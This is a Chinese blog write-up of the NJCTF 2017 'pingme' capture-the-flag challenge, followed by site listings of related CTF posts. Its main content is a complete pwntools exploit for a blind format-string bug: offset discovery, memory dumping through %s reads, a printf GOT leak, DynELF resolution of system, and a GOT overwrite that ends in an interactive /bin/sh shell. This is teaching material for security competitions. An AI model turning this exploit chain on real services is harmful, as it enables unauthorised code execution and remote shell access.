NJCTF2017-pingme-wp

最新推荐文章于 2023-12-06 20:49:20 发布
最新推荐文章于 2023-12-06 20:49:20 发布
阅读量855 收藏 2
点赞数 1
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/113612880
版权

文件下载
注意这题是无源码和二进制文件的题目(blind fmt)
在这里插入图片描述
运行发现是输入字符串然后回显, 输入长字符常看是否崩溃判断溢出, 输入格式化字符串查看输出判断格式化漏洞
在这里插入图片描述
初步判断有格式化漏洞, 且AAAA在第7个参数位置, 也可以用pwntools的fmtstr模块确认位置

from pwn import *
io = process('./pingme')

def exec_fmt(payload):
    io.sendline(payload)
    info = io.recv()
    return info
auto = FmtStr(exec_fmt)
offset = auto.offset

print 'offset: ', offset

在这里插入图片描述
既然有格式化漏洞, 接下来就可以把二进制文件从内存中dump下来
先启动端口

socat tcp4-listen:10001,reuseaddr,fork exec:./pingme

from pwn import *

def dump_memory(start_addr, end_addr):
    result = ""
    
    while start_addr < end_addr:
        io = remote('127.0.0.1', '10001')
        io.recvline()
        payload = "%9$s.AAA" + p32(start_addr)
        io.sendline(payload)
        data = io.recvuntil(".AAA")[:-4]
        if data == "": data = "\x00"
        
        log.info("leaking: 0x%x --> %s" % (start_addr, data.encode('hex')))
        result += data
        start_addr += len(data)
        io.close()
    
    return result

start_addr = 0x8048000
end_addr = start_addr + 0x1000 #dump 0x1000 data should be enough
code_bin = dump_memory(start_addr, end_addr)
with open("pingme.bin", "wb") as f:
    f.write(code_bin)
    f.closed()

注意这有个小知识, 那就是32位程序在386系统中的虚拟地址都是从0x08048000开始
在这里插入图片描述查看printf的GOT地址: 0x08049974
在这里插入图片描述
接下就是泄露printf()的内存地址, 两种方法
方法一: 拿到libc.so, 归约到正常pwn题(
先泄露printf的虚拟地址, 然后到libc-database查询libc的版本拿到libc.so, 然后就可以计算出system()的地址

from pwn import *

io = remote('127.0.0.1', 10001)
printf_got = 0x08049974
def get_printf_addr():
    io.recvline()
    payload = "%9$s.AAA" + p32(printf_got)
    io.sendline(payload)
    data = u32(io.recvuntil(".AAA")[:4])
    log.info("printf address: 0x%x" % data)
    return data

get_printf_addr()

在这里插入图片描述
printf(): 0xf7d99020

… 之后补充libc方法exp

方法二: 使用DynELF进行无libc利用

from pwn import *

io = remote('127.0.0.1', 10001)
printf_got = 0x08049974

def leak(addr):
    io.recvline()
    payload = "%9$s.AAA" + p32(addr)
    io.sendline(payload)
    data = io.recvuntil(".AAA")[:-4] + '\x00'
    log.info("leaking: 0x%x --> %s" % (addr, data.encode('hex')))
    return data

data = DynELF(leak, printf_got)
system_addr = data.lookup('system', 'libc')
print(hex(system_addr))

在这里插入图片描述
完整exp

from pwn import *

io = remote('127.0.0.1', 10001)
printf_got = 0x08049974

def leak(addr):
    io.recvline()
    payload = "%9$s.AAA" + p32(addr)
    io.sendline(payload)
    data = io.recvuntil(".AAA")[:-4] + '\x00'
    log.info("leaking: 0x%x --> %s" % (addr, data.encode('hex')))
    return data

data = DynELF(leak, printf_got)
system_addr = data.lookup('system', 'libc')
printf_addr = data.lookup('printf', 'libc')
log.info('system address: 0x%x' % system_addr)
log.info('printf address: 0x%x' % printf_addr)

payload = fmtstr_payload(7, {printf_got: system_addr})
io.recvline()
io.sendline(payload)
io.recv()
io.sendline('/bin/sh')
io.interactive()

在这里插入图片描述



总结

这段代码是泄露格式化漏洞参数位置的板子, 可以打熟了

from pwn import *
io = process('./binary') # change file name

def exec_fmt(payload):
    io.sendline(payload)
    info = io.recv()
    return info
auto = FmtStr(exec_fmt)
offset = auto.offset

print 'offset: ', offset
fa1c4
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
NJCTF2017 线上赛 web 题解 By Assassin
Assassin
03-18 7000
Login打开以后出现一个登陆页面,下面有一个注册用户的链接。 打开申请界面 看着申请的密码还有要求不知道是不是题目的关键点。 我们先申请一个账号登陆一下看看,发现是这样的 尝试申请一下admin发现已经存在了那么本题的知识点是mysql变量名在输入太长的时候会被截断!!那么我们就可以构造不是admin但是阶段后是admin的用户名payload: username=admin
NJCTF 2017 web Writeup
Bendawang's Blog
03-13 8956
NJCTF 2017 web Writeup
NJCTF 2017-messager
最新发布
yld666的博客
12-06 180
但此处由于程序fork()出了子进程,子进程的崩溃并不影响主进程,所以此处我们可以通过爆破的方式突破canary保护,然后覆盖函数返回地址并将其改变为sub_400BC6,便可以成功获取flag文件值。分析可知,在第38行位置while循环中,每次发生连接程序就复刻(fork)一个子进程,然后跳出循环,调用sub_400BE9()函数与用户进行交互,如果函数正常返回,会打印出字符串“Message received!分析可知该函数打开flag文件,并将文件内容放入unk_602160处,
「抽奖赠书」CTF竞赛权威指南
漏洞战争
03-11 835
「本次图书由电子工业出版社博文视点赞助」前几天在“再聊CTF书籍”介绍过《CTF竞赛权威指南(Pwn篇)》一书,今天刚好从出版社那边要到5本书,全送大家。下次有机会的话,我争取搞几本其它书...
pingme:PingMe-MangaAnime通知程序
02-02
PingMe旨在为动漫/漫画社区提供多平台通知程序,使用户可以更轻松地保持自己喜欢的游戏的最新版本的更新。 技术栈 前端 单页Web应用程序是使用React / Router构建的,使用Redux来管理状态。 Redux-Saga处理异步事件...
ping-me:跨平台的个性化Ping
02-01
作者注 我不再从事这个项目。 维护服务器和其他扩展来存储提醒并按时执行它们需要花费很多精力。 有庞大的公司和初创公司正在为此工作。 这也使我第一次感到精疲力尽,因为我认为我可以在短时间内自己完成所有事情。...
pingme:PingMe是一个CLI工具,可将消息或警报发送到多个消息传递平台和电子邮件
04-16
PingMe CLI••••••显示支持• 关于PingMe是一个私人项目,可以满足我具有警报的需求,大多数主要平台都具有集成功能来发送警报,但是它并不总是有用的,要么是停留在一个特定的平台上,要么是必须进行大量的...
PingMe:CLI工具,可将消息发送到多个平台-开源
05-08
PingMe是一个私人项目,可以满足我具有警报的需求,大多数主要平台都具有发送警报的集成功能,但它并不总是有用的,要么是您陷入一个特定的平台,要么是必须进行大量的集成。 我需要一个小型应用程序,可以从备份...
PingMe:提供向多个平台发送消息的能力的 CLI 工具-开源
06-15
PingMe 是一个满足我对警报需求的个人项目,大多数主要平台都有发送警报的集成,但它并不总是有用,要么你被困在一个特定的平台上,要么你必须做很多集成。 我需要一个小应用程序,我可以从我的备份脚本、cron 作业...
Android-实用的安卓网络工具集包含Ping端口扫描等
08-13
实用的安卓网络工具集,包含Ping、端口扫描等
ctf入门手册.pdf
07-02
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯” 。
青少年CTF平台-Web-PingME
zxsctf的博客
10-09 1527
题目难度一颗星,五十分。
青少年CTF训练平台PingMe02
Fenghe2的博客
04-17 348
首先观察页面 发现页面提示/?ip 根据提示传入参数。cat、flag被过滤 用\绕过。发现过滤了空格,用%09绕过。加入管道符|进行执行命令。
NJCTF-2017-web-writeup
dengzhasong7076的博客
03-15 585
记录一下这次比赛web一些有意思的题 Be Logical(450) http://218.2.197.235:23739/ 注册账号密码进去后发现大概是一个,积分可以转换为金币,然后再历史纪录里面又可以将金币转换为积分。 第一个感觉肯定这个是逻辑漏洞,感觉积分和金币之间转换的时候,可以利用多线程来跑一下。 在积分转换为金币的页面得知Sign.php,后面猜解文件泄漏为.Sign.php...
2017NJCTF get flag writeup
Aurora的博客
03-12 1145
 题目网址:http://218.2.197.235:23725/         打开题目是一个输入框,是输入文件名来搜索图片的功能。随便输入aaa跳转到了另一个页面,是一张读不出来的图片。查看源代码可看到        查了一下是基于RFC2397的一种URL格式,可以直接嵌入网页显示的一种数据显示方式。base64后面是base64编码的语句,解密一
Blind_pwn之格式化字符串
蚁景网安学院
07-07 991
可能需要提前了解的知识格式化字符串原理&利用got & plt 调用关系程序的一般启动过程原理格式化字符串盲打指的是只给出可交互的 ip 地址与端口,不给出对应的 bin...
CTFping命令绕过及符号用法
Hardworking666的博客
10-13 9874
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
雅虎通推出 PingMe 服务,酷!
Fenng's Blog
09-28 1051
&#13; 雅虎通新推出了一个很有趣的服务: 雅虎 Pingme 。 这个 Pingme 的服务在雅虎通用户与非雅虎通用户之间建立了一个便捷的桥梁,雅虎 Pingme 服务是基于 Web 页面的,非雅虎通用户无需下载任何客户端无需任何设置,只需要点击一下鼠标即可轻松与雅虎通用户沟通。 雅虎通用户可以申请这个服务并把一小段HTML代码粘贴到 Web 页面上,随时随地与网友沟通,...
渗透靶场——HackMyVM:Pingme
tlovejr的博客
04-13 3278
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:桥接自动获取ip 靶机ip地址:(桥接自动获取ip) 提示信息: CTF 目标: user.txt和root.txt 信息收集 扫描主机 arp-scan -l 发现存活主机192.168.1.10 扫描端口 扫描靶机开放的服务端口 nmap -A -T4 -p- 192.168.1.10 发现还是只有22端口和80端口开放 Web渗透 访问web端口 http:

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值